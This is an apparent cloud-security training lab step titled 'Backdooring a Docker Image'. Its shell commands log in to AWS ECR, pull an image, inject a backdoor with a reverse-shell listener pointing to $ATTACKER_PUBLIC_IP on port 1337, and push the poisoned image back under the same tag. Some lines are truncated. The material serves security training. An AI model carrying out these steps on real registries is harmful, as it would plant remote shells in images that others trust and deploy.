Backdooring a Docker Image
⚡ Attention ⚡
💡 Conitnue using same terminal. Do not switch terminals unless stated below, or you'll need to re-export environment variables.
- Change directory to
, to make make sure folder structure is as per lab steps.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
- Set the repo
export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
export image_tag="latest"
- Set the default region using one-liner before proceeding further.
This will set the default region based on output.
- Login to AWS ECR.
export AWS_DEFAULT_REGION=$(echo "$repo:$image_tag" | awk -F. '{print $4}')
export aws_account_id=$(aws sts get-caller-identity --query "Account" --output text) && aws ecr get-login-password | docker login --username AWS --password-stdin $aws_account_id.dkr.ecr.$
- Pull the image to be backdoored.
docker pull "$repo:$image_tag"
- Generate the backdoor the image.
python3 ../solution/ \
--input "$repo:$image_tag" \
--output "$repo:$image_tag" \
--listener "$ATTACKER_PUBLIC_IP" \
--port 1337 \
--shell-url ""
- Push the backdoor image.
docker push $repo:$image_tag